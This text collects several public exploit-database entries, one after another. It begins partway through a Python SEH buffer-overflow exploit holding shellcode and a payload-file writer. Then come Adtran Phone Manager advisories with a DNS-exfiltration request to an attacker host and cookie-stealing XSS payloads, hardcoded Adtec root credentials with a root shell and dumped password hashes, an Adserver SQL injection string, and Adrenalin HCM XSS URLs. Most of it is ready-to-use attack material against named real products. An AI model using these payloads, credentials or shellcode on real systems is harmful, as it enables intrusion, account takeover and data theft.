"\x6b\xc0\x67\xbb\x92\xeb\x97\x92\x50\xbf\xc7\x8c\x71\xc0\x83"
"\x4c\x7d\x15\x03\x1c\xd1\xc6\xe4\xcc\x91\xb6\x8c\x06\x1e\xe8"
"\xad\x29\xf4\x81\x44\xd0\x9f\x6d\x30\xda\x48\x06\x43\xda\x71"
"\xa5\xca\x3c\x17\x59\x9b\x97\x80\xc0\x86\x63\x30\x0c\x1d\x0e"
"\x72\x86\x92\xef\x3d\x6f\xde\xe3\xaa\x9f\x95\x59\x7c\x9f\x03"
"\xf5\xe2\x32\xc8\x05\x6c\x2f\x47\x52\x39\x81\x9e\x36\xd7\xb8"
"\x08\x24\x2a\x5c\x72\xec\xf1\x9d\x7d\xed\x74\x99\x59\xfd\x40"
"\x22\xe6\xa9\x1c\x75\xb0\x07\xdb\x2f\x72\xf1\xb5\x9c\xdc\x95"
"\x40\xef\xde\xe3\x4c\x3a\xa9\x0b\xfc\x93\xec\x34\x31\x74\xf9"
"\x4d\x2f\xe4\x06\x84\xeb\x04\xe5\x0c\x06\xad\xb0\xc5\xab\xb0"
"\x42\x30\xef\xcc\xc0\xb0\x90\x2a\xd8\xb1\x95\x77\x5e\x2a\xe4"
"\xe8\x0b\x4c\x5b\x08\x1e")
evil="\x90"*20 + shellcode
# Bad chars : "\x00\x0a\x0d\x1a"
# 0x03912524 [SetMgr.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False | pop edi # pop esi # ret
b = "A"*4108 + "\xEB\x06\x90\x90" + "\x24\x25\x91\x03" + evil+ "B" * (1384-len(evil))
textfile = open (filename, 'w')
textfile.write(b)
textfile.close()
# Exploit Title: Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration
# Date: 1/21/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home
# Version: v10.8.1
# Tested on: NetVanta 7060 and NetVanta 7100
# CVE : CVE-2021-25681
# CVE-2021-25681 - AdTran Personal Phone Manager DNS Exfiltration
--Summary--
The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow for exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS.
ADTRAN, Inc
https://adtran.com
--Affects--
- AdTran Personal Phone Manager
- Verified on v10.8.1
- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance.
--Details--
The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow for exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS. This is achieved by simply making a GET request to the vulnerable server containing a reference to a DNS target that is collecting the tunneled data. This can lead to:
- Utilizing exposed AdTran Personal Phone Manager Services as a redirector for DNS based Command and Control
- Utilizing exposed AdTran Personal Phone Manager Services as a redirector for DNS based arbitrary data exfiltration
-- Proof of Concept --
To exploit the issue all that is necessary is a simple DNS request:
GET http://mydns.attack.com/ HTTP/1.1
Host: SOME ADTRAN HOST HERE
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
--Mitigation--
The server should be reconfigured to not perform arbitrary DNS lookups when the Host/Get requests do not match. Additionally scoping requests to only be allowed in the context of the application is ideal.
--Timeline--
- 1/21/2021: DNS Exfiltration vulnerability was discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication.
- 1/22/2021: Placeholder CVE-2021-25681 was assigned by MITRE.
- 1/29/2021: A response from AdTran's Product Security Team was received.
- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data.
- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline.
- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice.
- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details.
- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed.
- 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release.
- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.
# Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)
# Date: 1/21/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home
# Version: v10.8.1
# Tested on: NetVanta 7060 and NetVanta 7100
# CVE : CVE-2021-25680
# CVE-2021-25680 - Adtran Personal Phone Manager Multiple Reflected XSS
--Summary--
The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research
ADTRAN, Inc
https://adtran.com
--Affects--
- AdTran Personal Phone Manager
- Verified on v10.8.1
- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance.
--Details--
The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. These issues work by passing in a basic XSS payload to vulnerable GET parameters that are reflected in the output without saniztization. This can allow for several issues including but not limited to:
- Hijacking a user's session
- Modifying a user's configuration settings
- Using XSS payloads to capture input (keylogging)
-- Proof of Concept --
The following URL parameters were impacted and can be exploited with the sample payloads provided below:
- https://example.com/userapp/userSettings.html?emailSuccessMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
- https://example.com/userapp/phoneSettings.html?successMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
- https://example.com/userapp/phoneSettingsAction.html?formAction=&callForwardingFlag=1&callForwardNumber=SOMEDATA"><script>alert`XSS`</script>&apply=Apply Changes
- https://example.com/userapp/directoriesAction.html?formAction=applySpeedDialChanges&callEntryToDelete=&newSpeedDialName(1)=&newSpeedDialNumber(1)=&newSpeedDialName(2)=&newSpeedDialNumber(2)=&newSpeedDialName(3)=&newSpeedDialNumber(3)=&newSpeedDialName(4)=&newSpeedDialNumber(4)=&newSpeedDialName(5)=&newSpeedDialNumber(5)=&newSpeedDialName(6)=&newSpeedDialNumber(6)=&newSpeedDialName(7)=&newSpeedDialNumber(7)=&newSpeedDialName(8)=&newSpeedDialNumber(8)=&newSpeedDialName(9)=&newSpeedDialNumber(9)=&newSpeedDialName(10)=&newSpeedDialNumber(10)=&newSpeedDialName(11)=&newSpeedDialNumber(11)=&newSpeedDialName(12)=&newSpeedDialNumber(12)=SOMEDATA<script>alert`XSS`</script>&newSpeedDialName(13)=&newSpeedDialNumber(13)=&newSpeedDialName(14)=&newSpeedDialNumber(14)=&newSpeedDialName(15)=&newSpeedDialNumber(15)=&newSpeedDialName(16)=&newSpeedDialNumber(16)=&newSpeedDialName(17)=&newSpeedDialNumber(17)=&newSpeedDialName(18)=&newSpeedDialNumber(18)=&newSpeedDialName(19)=&newSpeedDialNumber(19)=&newSpeedDialName(20)=&newSpeedDialNumber(20)=&applySpeedDialChanges=Apply
The vulnerable parameters that were identified impact more pages than just the above. Any page that renders a response using the following parameters is impacted by this issue:
- emailSuccessMessage
- successMessage
- callForwardNumber
- newSpeedDialNumber(#)
--Mitigation--
Sanitize any user controlled input in both form fields and URL paramaters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.
--Timeline--
- 1/21/2021: XSS Vulnerabilities were discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication.
- 1/22/2021: Placeholder CVE-2021-25680 was assigned by MITRE.
- 1/29/2021: A response from AdTran's Product Security Team was received.
- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data.
- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline.
- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice.
- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details.
- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed.
- 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release.
- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.
# Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)
# Date: 1/21/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home
# Version: v10.8.1
# Tested on: NetVanta 7060 and NetVanta 7100
# CVE : CVE-2021-25679
# CVE-2021-25679 - Adtran Personal Phone Manager Authenticated Stored XSS in Change Email Address Form
--Summary--
The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research
ADTRAN, Inc
https://adtran.com
--Affects--
- AdTran Personal Phone Manager
- Verified on v10.8.1
- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance.
--Details--
The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. These issues work by passing in a basic XSS payload to vulnerable POST parameters that are rendered in the output without saniztization. Since the forms do require authentication to access these issues cannot be exploited without credentials. This can allow for several issues including but not limited to:
- Hijacking another user's session
- Modifying a user's configuration settings
- Using XSS payloads to capture input (keylogging)
-- Proof of Concept --
The following form was impacted and can be exploited with the sample payloads provided below:
- https://example.com/userapp/userSettingsAction.html
- POST
- formAction=changeEmailAddress&emailAddress=+data%22%3E%3Cscript%3Ealert%`document.cookie`60%3C%2Fscript%3E+&emailAddress2=&emailApply=Apply+Changes
The vulnerable parameters that were identified are:
- emailAddress
- emailAddress2
--Mitigation--
Sanitize any user controlled input in both form fields and URL paramaters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.
--Timeline--
- 1/21/2021: XSS Vulnerability was discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication.
- 1/22/2021: Placeholder CVE-2021-25679 was assigned by MITRE.
- 1/29/2021: A response from AdTran's Product Security Team was received.
- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data.
- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline.
- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice.
- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details.
- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed.
- 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release.
- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.
# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
# Date: 2020-07-24
# Exploit Author: LiquidWorm
# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads
# Version: Multiple
Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
Vendor: Adtec Digital, Inc.
Product web page: https://www.adtecdigital.com
https://www.adtecdigital.com/support/documents-downloads
Affected version: SignEdje Digital Signage Player v2.08.28
mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19
afiniti Multi-Carrier Platform v1905_11
EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15
EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29
EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29
ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24
edje-5110 Standard Definition MPEG2 Encoder v1.02.05
edje-4111 HD Digital Media Player v2.07.09
Soloist HD-Pro Broadcast Decoder v2.07.09
adManage Traffic & Media Management Application v2.5.4
Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and
solutions.
Desc: The devices utilizes hard-coded and default credentials within its Linux distribution
image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging
in using the default credentials for accessing the web interface or gain shell access as root.
Tested on: GNU/Linux 4.1.8 (armv7l)
GNU/Linux 3.12.38 (PowerPC)
GNU/Linux 2.6.14 (PowerPC)
Adtec Embedded Linux 0.9 (fido)
Apache
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5603
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php
24.07.2020
--
Creds:
------
adtec:none:500:1000:adtec:/media:/bin/sh
admin:1admin!:502:502:admin:/home/admin:/bin/sh
root1:1root!:0:0:root:/root:/bin/sh
adtecftp:adtecftp2231
SSH:
----
login as: root
root@192.168.3.12's password:
Successfully logged in.
Thank you for choosing Adtec Digital products-
we know you had a choice and we appreciate your decision!
root@targethostname:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
--
admin@targethostname:/$ id
uid=502(admin) gid=502(admin) groups=0(root),502(admin)
admin@targethostname:~$ id adtec
uid=500(adtec) gid=1000(users) groups=1000(users),72(apache)
admin@targethostname:~$ cat /etc/sudoers |grep -v "#"
root ALL=(ALL) ALL
apache ALL=(ALL) NOPASSWD: ALL
Telnet (API):
-------------
Adtec Resident Telnet Server...
UserName:
adtec
adtec
PassWord:
none
User adtec connected
*.SYSD SHELLCMD cat /etc/passwd
*.SYSD CMD cat /etc/passwd
OK
root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh
adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh
apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin
fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin
ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin
syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin
admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin
avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin
messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin
...
...
# # # # #
# Exploit Title: Adserver Script 5.6 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/adserverscript.php
# Demo: http://adserverscript.gvmhosting.com/
# Version: 5.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an advertiser to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
#
# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
#
# Etc..
# # # # #
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12234
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
# URL
# ====================
https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1
https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155
Parameter
====================
strAction
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12234
https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html
Discoverer
====================
Rishu Ranjan
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.
URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0
Parameter
====================
ReportId
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html
Discoverer
====================
Rishu Ranjan
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12650
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
URL
====================
https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
Parameter
====================
prntDDLCntrlName
prntFrmName
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12650
https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html
Discoverer
====================
Rishu Ranjan